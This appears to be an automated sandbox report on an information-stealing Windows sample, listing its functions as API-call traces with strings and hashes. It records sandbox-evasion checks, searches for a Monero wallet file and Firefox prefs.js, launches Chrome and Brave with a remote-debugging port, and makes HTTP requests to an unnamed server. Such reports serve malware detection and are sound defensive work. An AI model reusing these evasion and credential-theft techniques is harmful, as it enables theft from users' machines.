                            • Part of subcall function 00039BB0: GetProcAddress.KERNEL32(74DD0000,00FD2368), ref: 00039C0A
                            • Part of subcall function 00039BB0: GetProcAddress.KERNEL32(74DD0000,00FD2488), ref: 00039C22
                            • Part of subcall function 00039BB0: GetProcAddress.KERNEL32(74DD0000,00FD2260), ref: 00039C3A
                            • Part of subcall function 00039BB0: GetProcAddress.KERNEL32(74DD0000,00FD2338), ref: 00039C53
                            • Part of subcall function 00039BB0: GetProcAddress.KERNEL32(74DD0000,00FD9098), ref: 00039C6B
                            • Part of subcall function 00039BB0: GetProcAddress.KERNEL32(74DD0000,00FC5A70), ref: 00039C83
                            • Part of subcall function 00039BB0: GetProcAddress.KERNEL32(74DD0000,00FC5790), ref: 00039C9C
                            • Part of subcall function 00039BB0: GetProcAddress.KERNEL32(74DD0000,00FD2410), ref: 00039CB4
                            • Part of subcall function 00039BB0: GetProcAddress.KERNEL32(74DD0000,00FD22D8), ref: 00039CCC
                            • Part of subcall function 00039BB0: GetProcAddress.KERNEL32(74DD0000,00FD2308), ref: 00039CE5
                            • Part of subcall function 00039BB0: GetProcAddress.KERNEL32(74DD0000,00FD2440), ref: 00039CFD
                            • Part of subcall function 00039BB0: GetProcAddress.KERNEL32(74DD0000,00FC5950), ref: 00039D15
                            • Part of subcall function 00039BB0: GetProcAddress.KERNEL32(74DD0000,00FD23B0), ref: 00039D2E
                            • Part of subcall function 0003AA50: lstrcpy.KERNEL32(00040E1A,00000000), ref: 0003AA98
                            • Part of subcall function 000211D0: ExitProcess.KERNEL32 ref: 00021211
                            • Part of subcall function 00021160: GetSystemInfo.KERNEL32(?), ref: 0002116A
                            • Part of subcall function 00021160: ExitProcess.KERNEL32 ref: 0002117E
                            • Part of subcall function 00021110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0002112B
                            • Part of subcall function 00021110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00021132
                            • Part of subcall function 00021110: ExitProcess.KERNEL32 ref: 00021143
                            • Part of subcall function 00021220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0002123E
                            • Part of subcall function 00021220: __aulldiv.LIBCMT ref: 00021258
                            • Part of subcall function 00021220: __aulldiv.LIBCMT ref: 00021266
                            • Part of subcall function 00021220: ExitProcess.KERNEL32 ref: 00021294
                            • Part of subcall function 00036A10: GetUserDefaultLangID.KERNEL32 ref: 00036A14
                            • Part of subcall function 00021190: ExitProcess.KERNEL32 ref: 000211C6
                            • Part of subcall function 000379E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,000211B7), ref: 00037A10
                            • Part of subcall function 000379E0: RtlAllocateHeap.NTDLL(00000000), ref: 00037A17
                            • Part of subcall function 000379E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00037A2F
                            • Part of subcall function 00037A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00037AA0
                            • Part of subcall function 00037A70: RtlAllocateHeap.NTDLL(00000000), ref: 00037AA7
                            • Part of subcall function 00037A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00037ABF
                            • Part of subcall function 0003ACC0: lstrlen.KERNEL32(?,00FD91F8,?,\Monero\wallet.keys,00040E1A), ref: 0003ACD5
                            • Part of subcall function 0003ACC0: lstrcpy.KERNEL32(00000000), ref: 0003AD14
                            • Part of subcall function 0003ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0003AD22
                            • Part of subcall function 0003ABB0: lstrcpy.KERNEL32(?,00040E1A), ref: 0003AC15
                          • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00FD9048,?,000410F4,?,00000000,?,000410F8,?,00000000,00040AF3), ref: 00036D6A
                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00036D88
                          • CloseHandle.KERNEL32(00000000), ref: 00036D99
                          • Sleep.KERNEL32(00001770), ref: 00036DA4
                          • CloseHandle.KERNEL32(?,00000000,?,00FD9048,?,000410F4,?,00000000,?,000410F8,?,00000000,00040AF3), ref: 00036DBA
                          • ExitProcess.KERNEL32 ref: 00036DC2
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$Process$Exit$Heap$lstrcpy$AllocateCloseEventHandleNameUser__aulldiv$AllocComputerCreateCurrentDefaultGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                          • String ID:
                          • API String ID: 2525456742-0
                          • Opcode ID: fd09d1808cfc8dfb5d745ea9fdc3aa288b621e04cd562d91413738e458c5c346
                          • Instruction ID: ef1ece51562e68f43b8aa66f88b486863112477c02bab5a7381de37ce4028f7a
                          • Opcode Fuzzy Hash: fd09d1808cfc8dfb5d745ea9fdc3aa288b621e04cd562d91413738e458c5c346
                          • Instruction Fuzzy Hash: D1310B71A14208ABCB16FBF0EC66AFEB37DAF15350F104928F15666193DF706905CA62

                          Control-flow Graph
                          • [control-flow graph image for function at 21220-2129d; legend: Executed / Not Executed]
                          APIs
                          • GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0002123E
                          • __aulldiv.LIBCMT ref: 00021258
                          • __aulldiv.LIBCMT ref: 00021266
                          • ExitProcess.KERNEL32 ref: 00021294
                          Strings
                          Yara matches
                          Similarity
                          • API ID: __aulldiv$ExitGlobalMemoryProcessStatus
                          • String ID: @
                          • API String ID: 3404098578-2766056989
                          • Opcode ID: 67331a0191768b18aa1de73386582232b97fe63734b5acd7a822913acc4b07e8
                          • Instruction ID: 8e27569f3fa0a6256f21e15774b0edefb1f2c703527d50747c9d03afcf285125
                          • Opcode Fuzzy Hash: 67331a0191768b18aa1de73386582232b97fe63734b5acd7a822913acc4b07e8
                          • Instruction Fuzzy Hash: 74016DB0D40318FAEB10DFE0EC4ABEEBBB8AB24705F208459F604B61C1C7B455598759

                          Control-flow Graph
                          • [control-flow graph image for function at 36d5a-36dc2; legend: Executed / Not Executed]
                          APIs
                          • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00FD9048,?,000410F4,?,00000000,?,000410F8,?,00000000,00040AF3), ref: 00036D6A
                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00036D88
                          • CloseHandle.KERNEL32(00000000), ref: 00036D99
                          • Sleep.KERNEL32(00001770), ref: 00036DA4
                          • CloseHandle.KERNEL32(?,00000000,?,00FD9048,?,000410F4,?,00000000,?,000410F8,?,00000000,00040AF3), ref: 00036DBA
                          • ExitProcess.KERNEL32 ref: 00036DC2
                          Yara matches
                          Similarity
                          • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                          • String ID:
                          • API String ID: 941982115-0
                          • Opcode ID: a0dd55940baabc4225e0509f6bd84e1d4ee0480c45e0d890eec5575834c3e724
                          • Instruction ID: af10541fbc844ee8abdc5e5156691941c978ef3b61ca4a3d15cff02e2ba97037
                          • Opcode Fuzzy Hash: a0dd55940baabc4225e0509f6bd84e1d4ee0480c45e0d890eec5575834c3e724
                          • Instruction Fuzzy Hash: 34F05E30A48209BBEB52ABA0EC0ABFE777CAF05751F108525F516A5191CBB15504CA51

                          Control-flow Graph

                          APIs
                          • lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00024889
                          • InternetCrackUrlA.WININET(00000000,00000000), ref: 00024899
                          Strings
                          Yara matches
                          Similarity
                          • API ID: CrackInternetlstrlen
                          • String ID: <
                          • API String ID: 1274457161-4251816714
                          • Opcode ID: 778957888e079d9de93bdcf4f615b66fda5b9d5e0be3d52d690c0378f6b5c174
                          • Instruction ID: 6c47d61d1204ba89e5578510ae2d70ec5e8c5a17bcc4b94a58d2f8fd6ea4270a
                          • Opcode Fuzzy Hash: 778957888e079d9de93bdcf4f615b66fda5b9d5e0be3d52d690c0378f6b5c174
                          • Instruction Fuzzy Hash: 58214FB1E00208ABDF14DFA4E845ADE7B78FB45360F108625F929A72C1DB706A05CF91

                          Control-flow Graph

                          APIs
                            • Part of subcall function 0003AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0003AAF6
                            • Part of subcall function 000262D0: InternetOpenA.WININET(00040DFF,00000001,00000000,00000000,00000000), ref: 00026331
                            • Part of subcall function 000262D0: StrCmpCA.SHLWAPI(?,00FDEA68), ref: 00026353
                            • Part of subcall function 000262D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00026385
                            • Part of subcall function 000262D0: HttpOpenRequestA.WININET(00000000,GET,?,00FDE068,00000000,00000000,00400100,00000000), ref: 000263D5
                            • Part of subcall function 000262D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0002640F
                            • Part of subcall function 000262D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00026421
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00035478
                          Strings
                          Yara matches
                          Similarity
                          • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                          • String ID: ERROR$ERROR
                          • API String ID: 3287882509-2579291623
                          • Opcode ID: f41e70fde06ac24a4a09220d4c4c2567c1e2e004239449db7bc054c84d4220a3
                          • Instruction ID: 2bb1416aa90491acb698f31c853a274a5dbab2eb2c7d5f047062a1e87d6a4e47
                          • Opcode Fuzzy Hash: f41e70fde06ac24a4a09220d4c4c2567c1e2e004239449db7bc054c84d4220a3
                          • Instruction Fuzzy Hash: CF111271A00508ABDB15FFA4EDA2EED733DAF51340F404568F95A5B4A3EF30AB04CA52
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00037AA0
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00037AA7
                          • GetComputerNameA.KERNEL32(?,00000104), ref: 00037ABF
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateComputerNameProcess
                          • String ID:
                          • API String ID: 1664310425-0
                          • Opcode ID: ef82938d858a045e34e8ed6a010bff2d68a015746c9ad3f2467bd8d1c505b158
                          • Instruction ID: 9bac33916c0b7f46909424532933fff15592c2906ba2b57c4e2079f115c44e75
                          • Opcode Fuzzy Hash: ef82938d858a045e34e8ed6a010bff2d68a015746c9ad3f2467bd8d1c505b158
                          • Instruction Fuzzy Hash: CD0186B1908649ABC710DF98ED45BAEBBBCFB44761F10012AF605E2680D7745A00CBA1
                          APIs
                          • GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0002112B
                          • VirtualAllocExNuma.KERNEL32(00000000), ref: 00021132
                          • ExitProcess.KERNEL32 ref: 00021143
                          Yara matches
                          Similarity
                          • API ID: Process$AllocCurrentExitNumaVirtual
                          • String ID:
                          • API String ID: 1103761159-0
                          • Opcode ID: f6b971c759d2dba6b3346bf08467ff0fbd6020d184e974ac3c8e1019bf723349
                          • Instruction ID: 797e42ba3f4eb97071cf734be5eb61c4717b7d1a85b4ceb92eab294714cf9d84
                          • Opcode Fuzzy Hash: f6b971c759d2dba6b3346bf08467ff0fbd6020d184e974ac3c8e1019bf723349
                          • Instruction Fuzzy Hash: 66E0E670949308FBE7505B90BD0EB9D76689B04B55F100155F709761D0C6B525509659
                          APIs
                          • VirtualAlloc.KERNEL32(00000000,17C841C0,00003000,00000004), ref: 000210B3
                          • VirtualFree.KERNEL32(00000000,17C841C0,00008000,00000000,05E69EC0), ref: 000210F7
                          Yara matches
                          Similarity
                          • API ID: Virtual$AllocFree
                          • String ID:
                          • API String ID: 2087232378-0
                          • Opcode ID: b22dfac2c8de0097170ad5ea0ddc3d39ca00ba280b87feeab2eb2ea42ae27f7c
                          • Instruction ID: d0f2b79c75aed477cae07874f25c98f2f579ecd2f64e12f18f91290f02a22195
                          • Opcode Fuzzy Hash: b22dfac2c8de0097170ad5ea0ddc3d39ca00ba280b87feeab2eb2ea42ae27f7c
                          • Instruction Fuzzy Hash: 08F0E2B1641318BBE7149AA4AC99FAFB7DCE705B54F300858F904E3280D672AE00CBA0
                          APIs
                            • Part of subcall function 00037A70: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00037AA0
                            • Part of subcall function 00037A70: RtlAllocateHeap.NTDLL(00000000), ref: 00037AA7
                            • Part of subcall function 00037A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00037ABF
                            • Part of subcall function 000379E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,000211B7), ref: 00037A10
                            • Part of subcall function 000379E0: RtlAllocateHeap.NTDLL(00000000), ref: 00037A17
                            • Part of subcall function 000379E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00037A2F
                          • ExitProcess.KERNEL32 ref: 000211C6
                          Yara matches
                          Similarity
                          • API ID: Heap$Process$AllocateName$ComputerExitUser
                          • String ID:
                          • API String ID: 3550813701-0
                          • Opcode ID: b1dc6910abfd7c3a9f89699a5c0a1f798be3616978b2f16015abf8b5681d8758
                          • Instruction ID: 04a44498a023f219f377226b270576e8f878af515a3ea6a8bb04489b7e15ec98
                          • Opcode Fuzzy Hash: b1dc6910abfd7c3a9f89699a5c0a1f798be3616978b2f16015abf8b5681d8758
                          • Instruction Fuzzy Hash: 85E012F594430A53DA1173B4BC0BBAB329C5B1435AF000465F90982513EE35E8108266
                          APIs
                            • Part of subcall function 0003AA50: lstrcpy.KERNEL32(00040E1A,00000000), ref: 0003AA98
                            • Part of subcall function 0003AC30: lstrcpy.KERNEL32(00000000,?), ref: 0003AC82
                            • Part of subcall function 0003AC30: lstrcat.KERNEL32(00000000), ref: 0003AC92
                            • Part of subcall function 0003ACC0: lstrlen.KERNEL32(?,00FD91F8,?,\Monero\wallet.keys,00040E1A), ref: 0003ACD5
                            • Part of subcall function 0003ACC0: lstrcpy.KERNEL32(00000000), ref: 0003AD14
                            • Part of subcall function 0003ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0003AD22
                            • Part of subcall function 0003ABB0: lstrcpy.KERNEL32(?,00040E1A), ref: 0003AC15
                          • FindFirstFileA.KERNEL32(00000000,?,00040B32,00040B2F,00000000,?,?,?,00041450,00040B2E), ref: 0002BEC5
                          • StrCmpCA.SHLWAPI(?,00041454), ref: 0002BF33
                          • StrCmpCA.SHLWAPI(?,00041458), ref: 0002BF49
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0002C8A9
                          • FindClose.KERNEL32(000000FF), ref: 0002C8BB
                          Strings
                          • Brave, xrefs: 0002C0E8
                          • Preferences, xrefs: 0002C104
                          • \Brave\Preferences, xrefs: 0002C1C1
                          • --remote-debugging-port=9229 --profile-directory=", xrefs: 0002C534
                          • --remote-debugging-port=9229 --profile-directory=", xrefs: 0002C3B2
                          • Google Chrome, xrefs: 0002C6F8
                          • --remote-debugging-port=9229 --profile-directory=", xrefs: 0002C495
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                          • String ID: --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$ --remote-debugging-port=9229 --profile-directory="$Brave$Google Chrome$Preferences$\Brave\Preferences
                          • API String ID: 3334442632-1869280968
                          • Opcode ID: fa4e9f1ebe3a78e16df7eba1ff5daf4942178358b687a4c4a87118263164a3db
                          • Instruction ID: 81a30987995510bb713669f97c4b4b252ecc7fdd39884ea0337b348cc6dd2413
                          • Opcode Fuzzy Hash: fa4e9f1ebe3a78e16df7eba1ff5daf4942178358b687a4c4a87118263164a3db
                          • Instruction Fuzzy Hash: CB5246726101189BCB15FB70EDA6EEE737DAF55300F4045A8B54A66093EF309B48CF66
                          APIs
                          • wsprintfA.USER32 ref: 00033B1C
                          • FindFirstFileA.KERNEL32(?,?), ref: 00033B33
                          • lstrcat.KERNEL32(?,?), ref: 00033B85
                          • StrCmpCA.SHLWAPI(?,00040F58), ref: 00033B97
                          • StrCmpCA.SHLWAPI(?,00040F5C), ref: 00033BAD
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00033EB7
                          • FindClose.KERNEL32(000000FF), ref: 00033ECC
                          Strings
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                          • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                          • API String ID: 1125553467-2524465048
                          • Opcode ID: c3318748f866a691895cf90f7e4d906724d52d8c7d306fb1b6e166378b2249ba
                          • Instruction ID: 2c9d08e5441acd153026908fe40d3062db28ada3aa3e9a82daacb43b551699c8
                          • Opcode Fuzzy Hash: c3318748f866a691895cf90f7e4d906724d52d8c7d306fb1b6e166378b2249ba
                          • Instruction Fuzzy Hash: 4CA11FB1A00218ABDB65DFA4DC89FEA737DAF58700F044598F60D96181EB719B88CF61
                          APIs
                          • wsprintfA.USER32 ref: 00034B7C
                          • FindFirstFileA.KERNEL32(?,?), ref: 00034B93
                          • StrCmpCA.SHLWAPI(?,00040FC4), ref: 00034BC1
                          • StrCmpCA.SHLWAPI(?,00040FC8), ref: 00034BD7
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00034DCD
                          • FindClose.KERNEL32(000000FF), ref: 00034DE2
                          Strings
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextwsprintf
                          • String ID: %s\%s$%s\%s$%s\*
                          • API String ID: 180737720-445461498
                          • Opcode ID: 9f2278cbb893cbe2651331e4a514e7c6b01765ddab0f6990586ac673fffd3227
                          • Instruction ID: c6dd2616ea5e21649980701f183f6394238adc3d2dbb31508dd610765466ffc3
                          • Opcode Fuzzy Hash: 9f2278cbb893cbe2651331e4a514e7c6b01765ddab0f6990586ac673fffd3227
                          • Instruction Fuzzy Hash: 43614971904118ABDB60EBA0EC49FEA777CBF48740F0045E8F64D96151EB70AB88CF91
                          APIs
                          • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 000347D0
                          • RtlAllocateHeap.NTDLL(00000000), ref: 000347D7
                          • wsprintfA.USER32 ref: 000347F6
                          • FindFirstFileA.KERNEL32(?,?), ref: 0003480D
                          • StrCmpCA.SHLWAPI(?,00040FAC), ref: 0003483B
                          • StrCmpCA.SHLWAPI(?,00040FB0), ref: 00034851
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 000348DB
                          • FindClose.KERNEL32(000000FF), ref: 000348F0
                          • lstrcat.KERNEL32(?,00FDEAE8), ref: 00034915
                          • lstrcat.KERNEL32(?,00FDD860), ref: 00034928
                          • lstrlen.KERNEL32(?), ref: 00034935
                          • lstrlen.KERNEL32(?), ref: 00034946
                          Strings
                          Yara matches
                          Similarity
                          • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                          • String ID: %s\%s$%s\*
                          • API String ID: 671575355-2848263008
                          • Opcode ID: 3c9929cc92ca343388acbb282bd7bc51205bda2982b9c44062b0ba2516056a7c
                          • Instruction ID: 467fde17a2cbcbc51908f304e812a64e2b6341e84183ff5f231780c2f506c7c9
                          • Opcode Fuzzy Hash: 3c9929cc92ca343388acbb282bd7bc51205bda2982b9c44062b0ba2516056a7c
                          • Instruction Fuzzy Hash: 8F5156B15042189BDB24EB70EC89FEE737CAB58350F4045E8F64996051EF70AB88CF91
                          APIs
                          • wsprintfA.USER32 ref: 00034113
                          • FindFirstFileA.KERNEL32(?,?), ref: 0003412A
                          • StrCmpCA.SHLWAPI(?,00040F94), ref: 00034158
                          • StrCmpCA.SHLWAPI(?,00040F98), ref: 0003416E
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 000342BC
                          • FindClose.KERNEL32(000000FF), ref: 000342D1
                          Strings
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextwsprintf
                          • String ID: %s\%s
                          • API String ID: 180737720-4073750446
                          • Opcode ID: dab1d952542454e04f46bb36747b109bf04fed619017fad3c7c20e39d4def5bc
                          • Instruction ID: 0dede74d6ec1d7b0d4c958af66ec057f82a93cfa57c6597da2fa5a4e86a720b2
                          • Opcode Fuzzy Hash: dab1d952542454e04f46bb36747b109bf04fed619017fad3c7c20e39d4def5bc
                          • Instruction Fuzzy Hash: 475169B2904218ABCB25EBB0EC49EFE777CBF54340F4045D8B64996051EB71AB89CF54
                          APIs
                          • wsprintfA.USER32 ref: 0002EE3E
                          • FindFirstFileA.KERNEL32(?,?), ref: 0002EE55
                          • StrCmpCA.SHLWAPI(?,00041630), ref: 0002EEAB
                          • StrCmpCA.SHLWAPI(?,00041634), ref: 0002EEC1
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0002F3AE
                          • FindClose.KERNEL32(000000FF), ref: 0002F3C3
                          Strings
                          Yara matches
                          Similarity
                          • API ID: Find$File$CloseFirstNextwsprintf
                          • String ID: %s\*.*
                          • API String ID: 180737720-1013718255
                          • Opcode ID: 1ea7e772967abe3b320cce76399dabf1ee68d91cda077e567677754386f6651a
                          • Instruction ID: 1db723f0d0963bd96fa713af337ef189d1799ed6b3805146a640491807517366
                          • Opcode Fuzzy Hash: 1ea7e772967abe3b320cce76399dabf1ee68d91cda077e567677754386f6651a
                          • Instruction Fuzzy Hash: 0AE10372A111189ADB55FB60DC62EEEB33DAF55300F4045E9B54A62093EF306F89CF62
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: 2-by$2-by$2-byexpa$expa$expa$expand 3$expand 32-by$nd 3$nd 32-by$te k$te k$te k$te knd 3expand 32-by
                          • API String ID: 0-1562099544
                          • Opcode ID: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                          • Instruction ID: b4d9ed8afce343de73ce3e80d3d94b4b8c21ef0c37d08d42f756c92514670049
                          • Opcode Fuzzy Hash: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                          • Instruction Fuzzy Hash: 94E276B09083808FD7A4CF29C580B8BFBE1BFC8354F51892EE99997211D770A959CF56
                          APIs
                            • Part of subcall function 0003AA50: lstrcpy.KERNEL32(00040E1A,00000000), ref: 0003AA98
                            • Part of subcall function 0003AC30: lstrcpy.KERNEL32(00000000,?), ref: 0003AC82
                            • Part of subcall function 0003AC30: lstrcat.KERNEL32(00000000), ref: 0003AC92
                            • Part of subcall function 0003ACC0: lstrlen.KERNEL32(?,00FD91F8,?,\Monero\wallet.keys,00040E1A), ref: 0003ACD5
                            • Part of subcall function 0003ACC0: lstrcpy.KERNEL32(00000000), ref: 0003AD14
                            • Part of subcall function 0003ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0003AD22
                            • Part of subcall function 0003ABB0: lstrcpy.KERNEL32(?,00040E1A), ref: 0003AC15
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,000416B0,00040D97), ref: 0002F81E
                          • StrCmpCA.SHLWAPI(?,000416B4), ref: 0002F86F
                          • StrCmpCA.SHLWAPI(?,000416B8), ref: 0002F885
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0002FBB1
                          • FindClose.KERNEL32(000000FF), ref: 0002FBC3
                          Strings
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                          • String ID: prefs.js
                          • API String ID: 3334442632-3783873740
                          • Opcode ID: 73a744a001073d540f16b87d474d26a55b21cd3111e26e6f83c1d0aa1631911e
                          • Instruction ID: 9a7e53ed3b6622a008fc91f7046f1fd41780f60498fc91d01dbe4a0ffcc90c09
                          • Opcode Fuzzy Hash: 73a744a001073d540f16b87d474d26a55b21cd3111e26e6f83c1d0aa1631911e
                          • Instruction Fuzzy Hash: C7B13472A001189BCB25FF60DDA6EEE737DAF55340F0045A8E54A56193EF306B48CF92
                          APIs
                            • Part of subcall function 0003AA50: lstrcpy.KERNEL32(00040E1A,00000000), ref: 0003AA98
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0004523C,?,?,?,000452E4,?,?,00000000,?,00000000), ref: 00021963
                          • StrCmpCA.SHLWAPI(?,0004538C), ref: 000219B3
                          • StrCmpCA.SHLWAPI(?,00045434), ref: 000219C9
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00021D80
                          • DeleteFileA.KERNEL32(00000000), ref: 00021E0A
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 00021E60
                          • FindClose.KERNEL32(000000FF), ref: 00021E72
                            • Part of subcall function 0003AC30: lstrcpy.KERNEL32(00000000,?), ref: 0003AC82
                            • Part of subcall function 0003AC30: lstrcat.KERNEL32(00000000), ref: 0003AC92
                            • Part of subcall function 0003ACC0: lstrlen.KERNEL32(?,00FD91F8,?,\Monero\wallet.keys,00040E1A), ref: 0003ACD5
                            • Part of subcall function 0003ACC0: lstrcpy.KERNEL32(00000000), ref: 0003AD14
                            • Part of subcall function 0003ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0003AD22
                            • Part of subcall function 0003ABB0: lstrcpy.KERNEL32(?,00040E1A), ref: 0003AC15
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1797151165.0000000000021000.00000040.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                          • Associated: 00000000.00000002.1796925932.0000000000020000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000004C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000015D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.0000000000169000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.000000000018E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1797151165.00000000002F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.000000000030A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000492000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000575000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.0000000000598000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005A0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1798836116.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799449155.00000000005B1000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799647636.0000000000751000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1799712015.0000000000752000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_20000_file.jbxd
                          Yara matches
                          Similarity
